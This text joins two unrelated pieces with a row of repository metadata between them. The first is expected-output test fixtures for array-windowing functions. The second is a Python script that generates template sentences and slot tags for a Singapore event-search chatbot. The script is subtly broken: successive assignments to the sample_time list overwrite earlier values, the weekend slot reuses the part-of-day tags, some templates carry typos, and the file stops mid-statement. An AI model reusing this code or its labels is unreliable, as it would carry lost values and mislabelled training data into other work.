expected_list_split3d_basic = [np.array([[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]]),
np.array([[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]],
[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]]),
np.array([[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##############
# Case 2:
# step = 2; expect a smaller sized last list
##############
# data_list_split3d_2steps = split3d(data3d_np, window=8, step=2, offset = 0, keep_tail=False)
expected_list_split3d_2steps = [np.array([[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]],
[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]]),
np.array([[[ 0.01, 1.92, -0.68]],
[[ 0.01, 1.92, -0.68]]])]
################
# Case 3:
# keep_tail = True, while other parameters unchanged; expect a smaller sized first list
################
# data_list_split3d_kepttail = split3d(data3d_np, window=8, step=2, offset = 0, keep_tail=True)
expected_list_split3d_kepttail = [np.array([[[-1.41, -0.28, -0.03]],
[[-1.41, -0.28, -0.03]]]),
np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]]),
np.array([[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
#################
# Case 4:
# offset = 2; expect one less list than if offset = 0
#################
# data_list_split3d_2offset = split3d(data3d_np, window=8, step=2, offset = 2, keep_tail=False)
expected_list_split3d_2offset = [np.array([[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]],
[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]]),
np.array([[[ 0.01, 1.92, -0.68]],
[[ 0.01, 1.92, -0.68]]])]
############################# Expected output for split_sample3d() ##############################
# test logic is identical to split3d()
##################
# Case 1:
# keep_tail = False, merge_remain = True
##################
# data_list_split_sample3d_FT = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=True)
expected_list_split_sample3d_FT = [np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]]),
np.array([[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##################
# Case 2:
# keep_tail = False, merge_remain = False
##################
# data_list_split_sample3d_FF = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=False)
expected_list_split_sample3d_FF = [np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]]),
np.array([[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]],
[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]])]
##################
# Case 3:
# keep_tail = True, merge_remain = True
##################
# data_list_split_sample3d_TT = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=True)
expected_list_split_sample3d_TT = [np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##################
# Case 4:
# keep_tail = True, merge_remain = False
##################
# data_list_split_sample3d_TF = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=False)
expected_list_split_sample3d_TF = [np.array([[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##################### Expected outputs from these split related functions when input is tensor ##################
def list_of_np_to_ts(lnp):
lts = []
for n in lnp:
lts.append(torch.tensor(n))
return lts
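# e.g. list_of_np_to_ts([np.eye(2)]) -> [tensor([[1., 0.], [0., 1.]], dtype=torch.float64)]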
# create input ts data
data2d_ts = torch.tensor(data2d_np)
data3d_ts = torch.tensor(data3d_np)
# ------------- split() -------------
# data_list_split_ts = split(data2d_ts, window=8, step=2, offset = 2, keep_tail=False)
expected_list_split_ts = list_of_np_to_ts(expected_list_split_2offset)
# ------------- split_sample() -------------
# data_list_split_sample_ts = split_sample(data2d_ts, window=window_sample, step=step_sample, offset = offset_sample, keep_tail=False, merge_remain=False)
expected_list_split_sample_ts = list_of_np_to_ts(expected_list_split_sample_FF)
# ------------- split3d() -------------
# data_list_split_sample3d_ts = split3d(data3d_ts, window=8, step=2, offset = 0, keep_tail=True)
expected_list_split3d_ts = list_of_np_to_ts(expected_list_split3d_kepttail)
# ------------- split_sample3d() -------------
# data_list_split_sample3d_ts = split_sample3d(data3d_ts, window=window_sample, step=step_sample, offset = offset_sample, keep_tail=True, merge_remain=True)
expected_list_split_sample3d_ts = list_of_np_to_ts(expected_list_split_sample3d_TT)
| 53.381513 | 156 | 0.252534 | 3,289 | 31,762 | 2.344482 | 0.042566 | 0.029179 | 0.038905 | 0.037349 | 0.884191 | 0.864739 | 0.859292 | 0.848139 | 0.838802 | 0.821683 | 0 | 0.257674 | 0.560009 | 31,762 | 594 | 157 | 53.47138 | 0.294097 | 0.120899 | 0 | 0.889474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002632 | false | 0 | 0.015789 | 0 | 0.021053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
780bf09ceb4db949cc97175af7c7765097e2db45 | 187,025 | py | Python | code/natural_language_understanding/inform_sentences_preparation.py | tanayz/SGbot | 983c756e1f0a2d5cb6d884fdfa34dc9c51eb74a0 | [
"MIT"
] | 4 | 2018-07-24T18:20:17.000Z | 2019-06-10T12:22:32.000Z | code/natural_language_understanding/inform_sentences_preparation.py | tanayz/SGbot | 983c756e1f0a2d5cb6d884fdfa34dc9c51eb74a0 | [
"MIT"
] | null | null | null | code/natural_language_understanding/inform_sentences_preparation.py | tanayz/SGbot | 983c756e1f0a2d5cb6d884fdfa34dc9c51eb74a0 | [
"MIT"
] | 2 | 2018-07-24T18:20:18.000Z | 2021-12-28T06:07:08.000Z | import dialog_config
import numpy as np
inform_venue_name_template = [
"Tell me about events near {}.",
"Are there any events near {}?",
"Does {} have any events?",
"What events are at {}?",
"I would like to find an event near {}.",
"Are there any events at {}?",
"Could you please tell me some events at {}?",
"Any events near {}?",
"Do you know any events near {}?",
"Can you recommend some events near {}?"]
inform_venue_name_tag = ["B-venue_name", "I-venue_name"]
sample_venue_name = ["Alexandra", "Aljunied", "Geylang", "Ayer Rajah", "Balestier", "Bartley", "Bishan",
"Marymount", "Sin Ming", "Bukit Timah", "Sixth Avenue", "Buona Vista", "Holland Village",
"one-north", "Ghim Moh", "Chinatown", "Clarke Quay", "Kreta Ayer", "Telok Ayer", "Kallang",
"Bendemeer", "Geylang Bahru", "Kallang Bahru", "Kallang Basin", "Kolam Ayer", "Tanjong Rhu",
"Mountbatten", "Old Airport", "Lavender", "Boon Keng", "Kent Ridge", "Kim Seng",
"Little India", "Farrer Park", "Jalan Besar", "MacPherson", "Marina Bay", "Esplanade",
"Marina Bay Sands", "Marina Centre", "Marina East", "Marina South", "Mount Faber",
"Mount Vernon", "Museum", "Newton", "Novena", "Orchard Road", "Dhoby Ghaut", "Emerald Hill",
"Peranakan Place", "Tanglin", "Outram", "Pasir Panjang", "Paya Lebar", "Eunos", "Geylang East",
"Potong Pasir", "Rochor-Kampong Glam", "Bencoolen", "Bras Basah", "Bugis", "Queenstown",
"Dover", "Commonwealth", "Raffles Place", "River Valley", "Singapore River",
"Southern Islands", "Tanjong Pagar", "Shenton Way", "Telok Blangah", "Bukit Chandu",
"Bukit Purmei", "HarbourFront", "Keppel", "Radin Mas", "Mount Faber", "Tiong Bahru",
"Bukit Ho Swee", "Bukit Merah", "Toa Payoh", "Bukit Brown", "Caldecott Hill", "Thomson",
"Whampoa", "St. Michael's", "East", "Bedok", "Bedok Reservoir", "Chai Chee", "Kaki Bukit",
"Tanah Merah", "Changi", "Changi Bay", "Changi East", "Changi Village", "East Coast",
"Joo Chiat", "Katong", "Kembangan", "Pasir Ris", "Elias", "Lorong Halus", "Loyang",
"Marine Parade", "Siglap", "Tampines", "Simei", "Ubi", "North", "Central Catchment Nature Reserve",
"Kranji", "Lentor", "Lim Chu Kang", "Neo Tiew", "Sungei Gedong", "Mandai", "Sembawang",
"Canberra", "Senoko", "Simpang", "Sungei Kadut", "Woodlands", "Admiralty", "Innova",
"Marsiling", "Woodgrove", "Yishun", "Chong Pang", "North-East", "Ang Mo Kio", "Cheng San",
"Chong Boon", "Kebun Baru", "Teck Ghee", "Yio Chu Kang", "Bidadari", "Hougang", "Defu",
"Kovan", "Lorong Chuan", "North-Eastern Islands", "Punggol", "Punggol Point",
"Punggol New Town", "Seletar", "Sengkang", "Serangoon", "Serangoon Gardens", "Serangoon North",
"Boon Lay", "Tukang", "Liu Fang", "Samulun", "Shipyard", "Bukit Batok", "Bukit Gombak",
"Hillview", "Guilin", "Bukit Panjang", "Choa Chu Kang", "Yew Tee",
"Clementi", "Toh Tuck", "West Coast", "Jurong East", "Toh Guan", "International Business Park",
"Teban Gardens", "Pandan Gardens", "Penjuru", "Yuhua", "Jurong Regional Centre",
"Jurong West", "Hong Kah", "Taman Jurong", "Boon Lay Place", "Chin Bee",
"Yunnan", "Central", "Kian Teck", "Safti", "Wenya", "Lim Chu Kang", "Pioneer", "Joo Koon",
"Gul Circle", "Pioneer Sector", "Tengah", "Tuas", "Wrexham", "Promenade", "Pioneer",
"Soon Lee", "Tuas South", "Western Islands Planning Area", "Western Water Catchment",
"Murai", "Sarimbun"]
inform_region_template = [
"Tell me about events in the {}.",
"Tell me about events in the {} area.",
"Tell me about events in the {} region.",
"Are there any events in the {} area?",
"Are there any events in the {} region?",
"What events are in the {}?",
"What events are in the {} region?",
"What events are in the {} area?",
"I would like to find an event in the {}.",
"I would like to find an event in the {} region.",
"I would like to find an event in the {} area.",
"Are there any events in the {}?",
"Are there any events in the {} region?",
"Are there any events in the {} area?",
"Could you please tell me some events in the {}?",
"Could you please tell me some events in the {} area?",
"Could you please tell me some events in the {} region?",
"Any events in the {}?",
"Any events in the {} area?",
"Any events in the {} region?",
"Do you know any events in the {}?",
"Do you know any events in the {} region?",
"Can you recommend some events in the {}?",
"Can you recommend some events in the {} area?",
"Tell me about events in the {} area of Singapore.",
"Are there any events in the {} region of Singapore?",
"What events are in the {} area of Singapore?",
"I would like to find an event in the {} region of Singapore.",
"Are there any events in the {} region of Singapore?",
"Could you please tell me some events in the {} area of Singapore?",
"Any events in the {} region of Singapore?",
"Do you know any events in the {} region of Singapore?",
"Can you recommend some events in the {} area of Singapore?"]
inform_region_tag = ["B-region"]
sample_region = ["City", "South", "West", "Central", "East", "North"]
inform_event_host_template = [
"Are there events by {}?",
"What events would be organised by {}?",
"Is {} organising any events?",
"What events are {} organising?",
"Which event is {} an organiser of?",
"Are there any events by the group {}?",
"Is the group {} organising any events?",
"Any events with {}?",
"Could you please recommend me some events organising by {}?",
"Can you tell me events by {}?"
]
inform_event_host_tag = ["B-event_host", "I-event_host"]
sample_event_host = [
"Sg Intl Investors & Social Networking Club. 3,000+ Members", "Badminton Fanatics",
"Singapore Beauty Workshop by Jo Makeup", "Sg International Globetrotters Club- SIGC 8,000+ Members",
"Speed & Blind Dating Club", "Expats Social Networking Club- ESNC", "Expats Social Networking Club",
"Meetup Newbies Gathering & Mingling Club", "SINGAPORE SINGLES & DATING CLUB",
"I'M SINGLE, YOU'RE SINGLE. LET'S MINGLE & LATER SNUGGLE", "Afterwork Drinks For Friendship & Social Networking Club",
"Expats & Social Nomads", "Social Networking & Hanging Out With New Friends Club", "Freelancers Singapore Meetup",
"Singapore Fun Events (SFE)", "Zumba! Singapore (1Fiesta)", "E-Commerce as Easy as 123", "Art Of Movement Meetup",
"Singapore Fun Events (SFE)", "StrangerSoccer - Daily soccer games for you all over Spore!", "Jo Makeup",
"EXPAT FRIENDS SINGAPORE", "All My Friends Are in Couples & I'm Single", "Singapore Women's Empowerment",
"The Golden Space", "LiveLife with Fun Events & Activities", "Badminton Workout",
"Dance Haven Bellydance & Bellydance Fitness", "Singapore Oyster Crawl",
"Singapore International Opportunities Networking (SION)", "SBN: Business Networking over Quality Tea (BNQT)",
"StrangerSoccer", "SBN: B2B2C Global Luncheon Networking", "Singapore International Opportunities Networking (SION)",
"Innovation Marketing & Sales Group", "Comedy Hub Singapore", "Singapore Squash Players", "Wind Slicer Badminton",
"JOYCORONA", "Singapore Trekking Group (SgTrek)", "Starz PB", "Culinary Underground Singapore", "Cooking In Singapore",
"Jiggle Wigs Music", "Isha Kriya", "Lula", "Charissa", "Dwight", "Christoper", "Juana", "Gennie", "Eustolia", "Kip",
"Diana", "Ophelia", "Hipolito", "Javier", "Angle", "Hui", "Josefine", "Oliva", "Alex", "Reagan", "Mitsue", "Kyoko",
"Carlton", "Felipa", "Jazmin", "Gilma", "Minnie", "Duncan", "Shaun", "Margurite", "Necole", "Dewayne", "Charlotte",
"Adrien", "Carissa", "Waldo", "Jillian", "Clemente", "Walker", "Broderick", "Sabrina", "Novella", "Mckenzie",
"Etsuko", "Jadwiga", "Jerold", "Estelle", "Jetta", "Sierra", "Jacquelyn", "Edgar", "See", "OCBC Bank", "DBS Group",
"Singtel", "UOB", "Wilmar International", "Trafigura Group", "Flextronics", "2C2P", "Aetos Security Management",
"AIBI International", "Antlabs", "Aspial Corporation", "Ayam Brand", "Bee Cheng Hiang", "Boustead Singapore",
"BreadTalk", "Broadcom Limited", "CapitaLand", "Carousell", "Certis CISCO", "Charles & Keith", "China Aviation Oil",
"ComfortDelGro", "Creative Technology", "DBS Bank", "dnata Singapore", "Far East Orchard", "Far East Organization",
"FilmTack", "Flextronics", "Fraser and Neave", "Garena", "Genting Singapore", "Golden Agri-Resources", "Grab",
"Great Eastern Life", "Hyflux", "Jetstar Asia Airways", "Jurong Port", "JTC Corporation", "Keppel Corporation",
"M1 Limited", "Mediacorp", "MyRepublic", "Near", "Neptune Orient Lines", "NTUC FairPrice", "OCBC Bank",
"Osim International", "PSA International", "Pacific Century Regional Developments Limited", "Popular Holdings",
"POSB Bank", "Quest Global", "Renewable Energy Corporation", "SATS Ltd", "SBS Transit", "Scoot", "SearchTrade",
"SembCorp Marine", "SIA Engineering Company", "Singapore Press Holdings", "SMRT Corporation", "SGAG", "Sheng Siong",
"SilkAir", "Singapore Airlines", "Singapore Airlines Cargo", "Singapore Exchange", "Singapore Petroleum Company Limited",
"Singapore Power", "Singapore Post", "Singtel", "ST Engineering", "StarHub", "Systems on Silicon Manufacturing",
"Tangs", "Tee Yih Jia", "Temasek Holdings", "Thakral Corporation", "Tiger Airways Holdings", "Transocean Singapore",
"Twelve Cupcakes", "Venture Corporation", "Vertex Venture Holdings", "Ya Kun Kaya Toast", "Yeo Hiap Seng", "Wilmar"]
inform_date_start_template = [
"I want to know what events are occurring on {}.",
"Are there any events on {}?",
"What events are on {}?",
"Does {} have events I can attend?",
"Will there be any events on {}?",
"Can you recommend me some events on {}?",
"Do you kow any events holding on {}?",
"Do you have any suggestions on events on {}?"
]
inform_date_start_tag = ["B-date_start", "I-date_start"]
sample_date_start_weekday = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday",
"Sun", "Mon", "Tue", "Tues", "Wed", "Weds", "Thu", "Thurs", "Fri", "Sat"]
sample_date_start_month =[ "January", "February", "March", "April", "May", "June", "July", "August", "September", "October",
"November", "December", "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Sept", "Oct", "Nov", "Dec"]
np.random.shuffle(sample_date_start_month)
np.random.shuffle(sample_date_start_weekday)
sample_date_start = sample_date_start_weekday + ['next ' + date for date in sample_date_start_weekday[:5]]
sample_date_start += sample_date_start_month + ['next ' + date for date in sample_date_start_month[:5]]
for i in range(2015, 2020):
np.random.shuffle(sample_date_start_month)
sample_date_start += [date + ' ' + str(i) for date in sample_date_start_month[:5]]
for i in range(1, 32):
np.random.shuffle(sample_date_start_month)
sample_date_start += [date + ' ' + str(i) for date in sample_date_start_month[:5]]
sample_date_start += [str(i) + ' ' + date for date in sample_date_start_month[:5]]
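# The two loops above add absolute-date strings such as "Mar 2017", "Oct 14"
# and "14 Oct", using five randomly chosen month spellings per year and per
# day of month.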
inform_time_template = [
"I would like to know about events that are around {}.",
"Are there any events that start at {}?",
"Tell me about events around {}.",
"Will there be any events around {}?",
"I want to know if there are events at {}?",
"Do you know any events start at {}?",
"Can you recommend any event begins around {}?",
"Can I know some events at around {}?",
"I would like to know about events holding around {}.",
"I would like to know about events occurring around {}.",
"Tell me about events holding around {}.",
"Tell me about events occurring around {}.",
"Will there be any events holding around {}?",
"Will there be any events occurring around {}?",
"I want to know if there are events holding at {}?",
"I want to know if there are events occurring at {}?",
"Can you recommend any event begins around {}?",
"Can I know some events that begin at around {}?",
"Can I know some events beginning at around {}?"
]
inform_time_tag = ["B-time", "I-time"]
sample_time = [str(time) for time in range(15,18)]
sample_time = [str(time) + " a.m." for time in range(3,6)]
sample_time = [str(time) + " p.m." for time in range(9,12)]
sample_time = [str(time) + " o'clock" for time in range(12,15)]
sample_time += [str(time) + ':00' for time in range(0,3)]
sample_time += [str(time) + ':00' + " am" for time in range(3, 6)]
sample_time += [str(time) + ':00' + " pm" for time in range(9, 13)]
sample_time += [str(time) + ':15' for time in range(3,6)]
sample_time += [str(time) + ':15' + " pm" for time in range(0, 3)]
sample_time += [str(time) + ':15' + " p.m." for time in range(3, 6)]
sample_time += [str(time) + ':15' + " o'clock" for time in range(18,21)]
sample_time += [str(time) + ':30' for time in range(6,9)]
sample_time += [str(time) + ':30' + " am" for time in range(9, 13)]
sample_time += [str(time) + ':30' + " a.m." for time in range(0,3)]
sample_time += [str(time) + ':30' + " o'clock" for time in range(21,24)]
sample_time += [str(time) + ':45' for time in range(9, 13)]
sample_time += [str(time) + ':45' + " a.m." for time in range(3, 6)]
sample_time += [str(time) + ':45' + " pm" for time in range(6, 9)]
inform_price_template = [
"Do you know any free events?",
"Tell me about some free events.",
"Can you recommend me some free events?",
"Do you have any suggestions for free events?",
"Are there any events around {} dollars.",
"Are there any events around {} SGD.",
"Are there any events less than {} dollars.",
"Are there any events less than {} SGD.",
"Are there any events around ${}.",
"I would like to find an event that costs {} dollars.",
"I would like to find an event that costs {} SGD.",
"I would like to find an event that costs ${}.",
"Let me know if there are events that are around {} dollars.",
"Let me know if there are events that are around {} SGD.",
"Let me know if there are events that are less than {} dollars.",
"Let me know if there are events that are less than {} SGD.",
"Let me know if there are events that are around ${}.",
"Let me know if there are events that are around {} SGD.",
"Will there be events that cost less than {} dollars?",
"Will there be events that cost less than {} SGD?",
"Will there be events that cost around {} dollars?",
"Will there be events that cost around {} SGD?",
"Will there be events that cost ${}?",
"Will there be events that cost {} SGD?"
]
inform_price_tag = ["B-price"]
sample_price = ["1", "2", "3", "4", "5", "10", "15", "20", "25", "30", "35", "40", "45", "50", "60", "70", "80", "90",
"100", "150", "200"]
inform_is_weekend_template = [
"Tell me about events that on {}.",
"Which events take place on {}.",
"I would like to find an event that is on {}.",
"What events are conducted on {}.",
"Will there be events that take place on {}?",
"I want to know the events that are available on {}.",
"Can you recommend some events on {}?",
"Do you have any suggestions on events on {}?",
"I want to find some events on {}."
]
inform_is_weekend_tag = ["B-part_of_day", "I-part_of_day"]
sample_is_weekend=["weekend", "weekdays"]
inform_part_of_day_template = [
"Tell me about events that are in {}.",
"Which events take place on {}.",
"I would like to find an event that is in {}.",
"What events are conducted on {}.",
"Will there be events that take place in {}?",
"I want to know the events that are available at {}.",
"Can you recommend some events start at {}?",
"Do you know any events begins in {}?",
"Do you have any suggestions on events in {}?",
"I want to find some events in {}."
]
inform_part_of_day_tag = ["B-part_of_day", "I-part_of_day"]
sample_part_of_day=["morning", "afternoon", "night", "evening", "noon", "dawn", "dusk", "twilight", "sunrise", "sun rise",
"sunset", "sun set", "daybreak", "day break", "night send", "daytime", "nighttime", "daylight",
"day light", "mid night", "midnight", "mid day", "midday", "after dark"]
inform_venue_name_and_region_template = [
"Tell me about events near {venue_name} in the {region}.",
"Tell me about events near {venue_name} in the {region} area.",
"Tell me about events near {venue_name} in the {region} region.",
"Tell me about events near {venue_name} in the {region} region of Singapore.",
"Tell me about events near {venue_name} in the {region} area of Singapore.",
"Are there any events near {venue_name} in the {region}?",
"Are there any events near {venue_name} in the {region} area?",
"Are there any events near {venue_name} in the {region} region?",
"Are there any events near {venue_name} in the {region} region of Singapore?",
"Are there any events near {venue_name} in the {region} area of Singapore?",
"Does {venue_name} in the {region} have any events?",
"Does {venue_name} in the {region} area have any events?",
"Does {venue_name} in the {region} region have any events?",
"Does {venue_name} in the {region} area of Singapore have any events?",
"Does {venue_name} in the {region} region of Singapore have any events?",
"What events are at {venue_name} in the {region}?",
"What events are at {venue_name} in the {region} area?",
"What events are at {venue_name} in the {region} region?",
"What events are at {venue_name} in the {region} area of Singapore?",
"What events are at {venue_name} in the {region} region of Singapore?",
"I would like to find an event near {venue_name} in the {region}.",
"I would like to find an event near {venue_name} in the {region} area.",
"I would like to find an event near {venue_name} in the {region} region.",
"I would like to find an event near {venue_name} in the {region} of Singapore.",
"I would like to find an event near {venue_name} in the {region} region of Singapore.",
"I would like to find an event near {venue_name} in the {region} area of Singapore.",
"Are there any events at {venue_name} in the {region}?",
"Are there any events at {venue_name} in the {region} area?",
"Are there any events at {venue_name} in the {region} region?",
"Are there any events at {venue_name} in the {region} of Singapore?",
"Are there any events at {venue_name} in the {region} area of Singapore?",
"Are there any events at {venue_name} in the {region} region of Singapore?",
"Could you please tell me some events at {venue_name} in the {region}?",
"Could you please tell me some events at {venue_name} in the {region} area?",
"Could you please tell me some events at {venue_name} in the {region} region?",
"Could you please tell me some events at {venue_name} in the {region}?",
"Could you please tell me some events at {venue_name} in the {region} area of Singapore?",
"Could you please tell me some events at {venue_name} in the {region} region of Singapore?",
"Any events near {venue_name} in the {region}?",
"Any events near {venue_name} in the {region} region?",
"Any events near {venue_name} in the {region} area?",
"Any events near {venue_name} in the {region} of Singapore?",
"Any events near {venue_name} in the {region} region of Singapore?",
"Any events near {venue_name} in the {region} area of Singapore?",
"Do you know any events near {venue_name} in the {region}?",
"Do you know any events near {venue_name} in the {region} region?",
"Do you know any events near {venue_name} in the {region} area?",
"Do you know any events near {venue_name} in the {region}?",
"Do you know any events near {venue_name} in the {region} region of Singapore?",
"Do you know any events near {venue_name} in the {region} area of Singapore?",
"Can you recommend some events near {venue_name} in the {region}?",
"Can you recommend some events near {venue_name} in the {region} area?",
"Can you recommend some events near {venue_name} in the {region} region?",
"Can you recommend some events near {venue_name} in the {region} of Singaproe?",
"Can you recommend some events near {venue_name} in the {region} region of Singapore?",
"Can you recommend some events near {venue_name} in the {region} area of Singapore?"
]
inform_venue_name_and_event_host_template = [
